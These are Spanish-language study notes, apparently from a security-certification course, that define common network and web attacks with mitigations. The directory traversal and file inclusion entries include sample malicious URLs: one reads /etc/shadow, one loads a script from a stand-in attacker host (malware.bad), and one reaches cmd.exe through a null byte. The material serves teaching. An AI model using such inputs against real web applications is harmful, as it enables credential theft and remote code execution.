SYN Flood
● Iniciar varias sesiones TCP sin completar el protocolo de enlace de tres vías
● Consume recursos del servidor e impide conexiones legítimas
● Contramedidas
○ Flood guard
○ Timeout configurations
○ Intrusion prevention systems
Permanent Denial of Service (PDOS) Attack
■ Aprovecha las vulnerabilidades de seguridad para dañar permanentemente un dispositivo de red al actualizar su firmware.
■ Requiere una recarga completa del firmware para que el dispositivo vuelva a estar en línea.
Fork Bomb
■ El ataque crea una gran cantidad de procesos, consumiendo potencia de procesamiento.
■ No se considera un gusano, ya que no infecta programas ni utiliza la red.
■ Su naturaleza autorreplicante provoca una condición de denegación de servicio.
DNS Amplification Attack
○ Ataque DDoS especializado que permite a un atacante iniciar solicitudes DNS desde una dirección IP falsa (la IP de la victima) para inundar un sitio web.
● Mitigación
○ Limitar el tamaño de las respuestas DNS.
○ Limitar la velocidad del tráfico de respuesta DNS para reducir el impacto.
DNS Cache Poisoning (DNS Spoofing)
● Corrompe la caché de un solucionador DNS con información falsa.
● Redirige a los usuarios a sitios web maliciosos.
● Mitigación.
○ Utiliza DNSSEC (Extensiones de Seguridad del Sistema de Nombres de Dominio) para añadir firmas digitales a los datos DNS.
○ Implementa configuraciones de red seguras y firewalls para proteger los servidores DNS.
DNS Tunneling
● Encapsula el tráfico que no es DNS (p. ej., HTTP, SSH) a través del puerto 53.
● Intenta eludir las reglas del firewall para comando y control o exfiltración de datos.
● Mitigación.
○ Supervisa y analiza los registros DNS para detectar patrones inusuales que indiquen tunelización.
Domain Hijacking (Domain Theft)
● Cambio no autorizado del registro de dominio
● Puede provocar la pérdida del control del sitio web y la redirección a un sitio malicioso.
● Mitigación
○ Actualice y proteja periódicamente la información de la cuenta de registro.
○ Utilice servicios de bloqueo del registro de dominio para evitar cambios no autorizados.
DNS Zone Transfer Attacks
● Intenta obtener una copia completa de los datos de la zona DNS
● Expone información confidencial sobre la infraestructura de red de un dominio
● Podría utilizarse para reconocimiento en futuros ataques
Directory Traversal Attack
■ Un ataque de inyección ocurre cuando el atacante inserta código malicioso a través de la interfaz de una aplicación.
■ Ataque de aplicación que permite el acceso a comandos, archivos y directorios que pueden o no estar conectados al directorio raíz del documento web.
http://diontraining.com/../../../../etc/shadow
File Inclusion
Vulnerabilidad en aplicaciones web que permite a un atacante descargar un archivo desde una ubicación arbitraria en el sistema de archivos del host o cargar un archivo ejecutable o script para abrir una puerta trasera.
Remote File Inclusion
● Un atacante ejecuta un script para inyectar un archivo remoto en la aplicación web o el sitio web.
○https://diontraining.com/login.php?
○user=http://malware.bad/malicious.php
Local File Inclusion
● Un atacante agrega un archivo a la aplicación web o al sitio web que ya existe en el servidor de alojamiento.
○ https://diontraining.com/login.php
○ usuario= ../../Windows/system32/cmd.exe%00
Arbitrary Code Execution
■ La vulnerabilidad permite a un atacante ejecutar su código sin restricciones.
■ Permite a los atacantes ejecutar su código en el sistema objetivo.
Remote Code Execution
Tipo de ejecución de código arbitrario que ocurre de forma remota, a menudo a través de internet.
Vertical Privilege Escalation
● Pasar de usuario normal a usuario con privilegios más altos (p. ej., administrador o root)
Horizontal Privilege Escalation
● Acceder o modificar recursos al mismo nivel que el atacante
● Ocurre cuando un usuario intenta acceder a recursos para los que no tiene permisos al mismo nivel
Kernel Mode Rootkit
● Integrado en el kernel (Ring Zero)
● Tiene máximo control y privilegios
● Altamente peligroso debido al amplio acceso al sistema
User Mode Rootkit
● Conectado a componentes de nivel de usuario (Anillos 1 a 3)
● Tiene privilegios de administrador
● Utiliza funciones del sistema operativo para la persistencia, por ejemplo, el registro o el programador de tareas
Replay Attacks
Tipo de ataque basado en la red en el que transmisiones de datos válidas se retransmiten, repiten o retrasan de forma maliciosa o fraudulenta.
■ Implica interceptar datos, analizarlos y decidir si se retransmiten posteriormente.
Session Management
■ Componente fundamental de seguridad en aplicaciones web
■ Permite que las aplicaciones web identifiquen de forma única a un usuario en diversas acciones y solicitudes, a la vez que conserva el estado de los datos generados por el usuario y garantiza que se asignen a ese usuario.
Session Hijacking
■ Un tipo de ataque de suplantación de identidad donde el atacante desconecta un host y lo reemplaza con su propia máquina, falsificando la dirección IP del host original.
■ Los ataques de secuestro de sesión pueden ocurrir mediante el robo o la modificación de cookies.
Session Prediction Attacks
■ Un tipo de ataque de suplantación de identidad en el que el atacante intenta predecir el token de sesión para secuestrar una sesión.
■ Un token de sesión debe generarse mediante un algoritmo no predecible y no debe revelar ninguna información sobre el cliente de la sesión.
Cookie Poisoning
Modifica el contenido de una cookie después de que el servicio web la haya generado y enviado al navegador del cliente para que la cookie recién modificada pueda utilizarse para explotar vulnerabilidades en la aplicación web.
On-Path Attack
■ Un ataque en el que el atacante posiciona su estación de trabajo lógicamente entre dos hosts durante la comunicación.
■ El atacante captura, monitorea y retransmite de forma transparente las comunicaciones entre esos hosts.